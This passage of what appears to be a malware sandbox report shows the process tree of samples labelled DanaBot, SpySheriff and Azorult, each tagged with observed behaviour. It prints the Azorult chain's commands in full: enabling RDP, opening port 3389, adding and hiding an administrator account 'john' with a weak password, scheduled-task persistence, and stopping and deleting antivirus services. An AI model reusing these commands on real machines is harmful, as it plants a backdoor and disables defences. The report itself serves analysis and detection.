        - Blocklisted process makes network request
        - Loads dropped DLL

    [depth 3] C:\Windows\SysWOW64\WerFault.exe
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 5768 -s 484
      PID: 4360
      - Program crash
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"2⤵
- Executes dropped EXE
PID:4184 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4184 -s 1523⤵
- Program crash
PID:5124
-
-
-
C:\Users\Admin\Downloads\DanaBot.exe"C:\Users\Admin\Downloads\DanaBot.exe"2⤵
- Executes dropped EXE
PID:5144 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5144 -s 1483⤵
- Program crash
PID:2460
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7576,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7672 /prefetch:82⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7568,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7484 /prefetch:12⤵PID:404
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=5140,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6316 /prefetch:12⤵PID:3952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7124,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7928 /prefetch:82⤵PID:5456
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7620,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:82⤵PID:568
-
-
C:\Users\Admin\Downloads\SpySheriff.exe"C:\Users\Admin\Downloads\SpySheriff.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5452
-
-
C:\Users\Admin\Downloads\SpySheriff.exe"C:\Users\Admin\Downloads\SpySheriff.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5752,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7984 /prefetch:82⤵PID:3212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7644,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6580 /prefetch:82⤵PID:2276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5200,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:82⤵PID:5080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=5276,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=5236 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6076,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:82⤵PID:5968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --always-read-main-dll --field-trial-handle=5556,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=3820 /prefetch:12⤵PID:1960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --always-read-main-dll --field-trial-handle=7220,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=4568 /prefetch:12⤵PID:3600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7116 /prefetch:82⤵PID:4668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3008,i,15901273165635689068,6734833161417653812,262144 --variations-seed-version --mojo-platform-channel-handle=7052 /prefetch:82⤵PID:2372
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- UAC bypass
- Blocks application from running via registry modification
- Drops file in Drivers directory
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies WinLogon
- Hide Artifacts: Hidden Users
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:5316 -
C:\ProgramData\Microsoft\Intel\wini.exeC:\ProgramData\Microsoft\Intel\wini.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6116 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"4⤵
- Checks computer location settings
PID:3752 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "5⤵PID:3528
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg1.reg"6⤵
- UAC bypass
- Windows security bypass
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
- Runs .reg file with regedit
PID:4868
-
-
C:\Windows\SysWOW64\regedit.exeregedit /s "reg2.reg"6⤵
- Runs .reg file with regedit
PID:2416
-
-
C:\Windows\SysWOW64\timeout.exetimeout 26⤵
- Delays execution with timeout.exe
PID:1932
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /silentinstall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1748
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /firewall6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3112
-
-
C:\ProgramData\Windows\rutserv.exerutserv.exe /start6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3416
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows\*.*6⤵
- Views/modifies file attributes
PID:5620
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:3936
-
-
C:\Windows\SysWOW64\sc.exesc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/10006⤵
- Launches sc.exe
PID:3964
-
-
C:\Windows\SysWOW64\sc.exesc config RManService obj= LocalSystem type= interact type= own6⤵
- Launches sc.exe
PID:3448
-
-
C:\Windows\SysWOW64\sc.exesc config RManService DisplayName= "Microsoft Framework"6⤵
- Launches sc.exe
PID:3256
-
-
-
-
C:\ProgramData\Windows\winit.exe"C:\ProgramData\Windows\winit.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4900 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat5⤵
- System Location Discovery: System Language Discovery
PID:5404 -
C:\Windows\SysWOW64\timeout.exetimeout 56⤵
- Delays execution with timeout.exe
PID:5476
-
-
-
-
-
C:\programdata\install\cheat.exeC:\programdata\install\cheat.exe -pnaxui3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5092 -
C:\ProgramData\Microsoft\Intel\taskhost.exe"C:\ProgramData\Microsoft\Intel\taskhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5388 -
C:\programdata\microsoft\intel\P.exeC:\programdata\microsoft\intel\P.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1216
-
-
C:\programdata\microsoft\intel\R8.exeC:\programdata\microsoft\intel\R8.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4184 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"6⤵
- Checks computer location settings
PID:4432 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "7⤵
- Checks computer location settings
- Modifies registry class
PID:1532 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1412
-
-
C:\Windows\SysWOW64\timeout.exetimeout 38⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5992
-
-
C:\Windows\SysWOW64\chcp.comchcp 12518⤵PID:5544
-
-
C:\rdp\Rar.exe"Rar.exe" e -p555 db.rar8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3384
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im Rar.exe8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5680
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:3976
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"8⤵
- Checks computer location settings
PID:2504 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "9⤵PID:1572
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f10⤵PID:4264
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f10⤵PID:3520
-
-
C:\Windows\SysWOW64\netsh.exenetsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5356
-
-
C:\Windows\SysWOW64\net.exenet.exe user "john" "12345" /add10⤵PID:940
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user "john" "12345" /add11⤵
- System Location Discovery: System Language Discovery
PID:4408
-
-
-
C:\Windows\SysWOW64\chcp.comchcp 125110⤵PID:3228
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Администраторы" "John" /add10⤵PID:3344
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" "John" /add11⤵PID:552
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administratorzy" "John" /add10⤵
- System Location Discovery: System Language Discovery
PID:5580 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administratorzy" "John" /add11⤵PID:4872
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administrators" John /add10⤵PID:3312
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add11⤵
- System Location Discovery: System Language Discovery
PID:4344
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Administradores" John /add10⤵PID:5744
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add11⤵PID:4464
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add10⤵PID:4060
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add11⤵PID:180
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Пользователи удаленного управления" John /add10⤵PID:4524
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5716
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Remote Desktop Users" John /add10⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:2204 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add11⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1620
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Usuarios de escritorio remoto" John /add10⤵PID:5348
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add11⤵PID:5764
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup "Uzytkownicy pulpitu zdalnego" John /add10⤵PID:3600
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add11⤵
- System Location Discovery: System Language Discovery
PID:5124
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -i -o10⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5988 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow11⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1952
-
-
-
C:\rdp\RDPWInst.exe"RDPWInst.exe" -w10⤵
- Executes dropped EXE
PID:552
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f10⤵
- Hide Artifacts: Hidden Users
PID:5972
-
-
C:\Windows\SysWOW64\net.exenet accounts /maxpwage:unlimited10⤵PID:3228
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 accounts /maxpwage:unlimited11⤵PID:5144
-
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper\*.*"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2200
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\Program Files\RDP Wrapper"10⤵
- Sets file to hidden
- Drops file in Program Files directory
- Views/modifies file attributes
PID:3920
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h "C:\rdp"10⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5668
-
-
-
-
C:\Windows\SysWOW64\timeout.exetimeout 28⤵
- Delays execution with timeout.exe
PID:4868
-
-
-
-
-
C:\ProgramData\Microsoft\Intel\winlog.exeC:\ProgramData\Microsoft\Intel\winlog.exe -p1235⤵
- Checks computer location settings
- Executes dropped EXE
PID:2492 -
C:\ProgramData\Microsoft\Intel\winlogon.exe"C:\ProgramData\Microsoft\Intel\winlogon.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
PID:3952 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\5FC5.tmp\5FC6.bat C:\ProgramData\Microsoft\Intel\winlogon.exe"7⤵PID:4468
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -command "Import-Module applocker" ; "Set-AppLockerPolicy -XMLPolicy C:\ProgramData\microsoft\Temp\5.xml"8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
-
-
-
-
C:\Programdata\RealtekHD\taskhostw.exeC:\Programdata\RealtekHD\taskhostw.exe5⤵
- Modifies visiblity of hidden/system files in Explorer
- Executes dropped EXE
- Adds Run key to start application
- NTFS ADS
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:5188 -
C:\Programdata\WindowsTask\winlogon.exeC:\Programdata\WindowsTask\winlogon.exe6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5356 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C schtasks /query /fo list7⤵PID:3088
-
C:\Windows\SysWOW64\schtasks.exeschtasks /query /fo list8⤵PID:2692
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ipconfig /flushdns6⤵PID:6064
-
C:\Windows\system32\ipconfig.exeipconfig /flushdns7⤵
- Gathers network information
PID:4116
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force6⤵PID:2192
-
C:\Windows\system32\gpupdate.exegpupdate /force7⤵PID:4884
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4772
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST5⤵
- Scheduled Task/Job: Scheduled Task
PID:520
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat5⤵
- Drops file in Drivers directory
- System Location Discovery: System Language Discovery
PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat5⤵PID:5956
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:2160
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK6⤵
- Delays execution with timeout.exe
PID:5716
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5992
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows6⤵
- Views/modifies file attributes
PID:3016
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4312
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc3⤵PID:4456
-
C:\Windows\SysWOW64\sc.exesc start appidsvc4⤵
- Launches sc.exe
PID:5324
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt3⤵PID:3948
-
C:\Windows\SysWOW64\sc.exesc start appmgmt4⤵
- Launches sc.exe
PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto3⤵PID:3692
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto4⤵
- Launches sc.exe
PID:1716
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto3⤵PID:5172
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto4⤵
- Launches sc.exe
PID:2388
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv3⤵
- System Location Discovery: System Language Discovery
PID:6000 -
C:\Windows\SysWOW64\sc.exesc delete swprv4⤵
- Launches sc.exe
PID:5500
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice3⤵
- System Location Discovery: System Language Discovery
PID:2224 -
C:\Windows\SysWOW64\sc.exesc stop mbamservice4⤵
- Launches sc.exe
PID:3016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice3⤵PID:832
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1016
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice3⤵PID:2460
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice4⤵
- Launches sc.exe
PID:316
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice3⤵PID:5960
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc3⤵PID:2256
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4184
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"3⤵PID:3092
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"4⤵
- Launches sc.exe
PID:5468
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer3⤵
- System Location Discovery: System Language Discovery
PID:1568 -
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer4⤵
- Launches sc.exe
PID:3084
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer3⤵PID:5424
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer4⤵
- Launches sc.exe
PID:4372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle3⤵PID:5256
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle4⤵
- Launches sc.exe
PID:4884
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"3⤵PID:3752
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:5776
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer3⤵PID:5496
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4456
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"3⤵PID:4676
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"4⤵
- Launches sc.exe
PID:5308
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_643⤵PID:4912
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_644⤵
- Launches sc.exe
PID:5408
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"3⤵PID:4512
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2192
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql3⤵PID:1280
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql4⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1788
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql3⤵PID:4908
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql4⤵
- Launches sc.exe
PID:1568
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on3⤵PID:1532
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1572
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵PID:5444
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵PID:916
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4424
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵PID:4052
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:5900
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵PID:5808
-
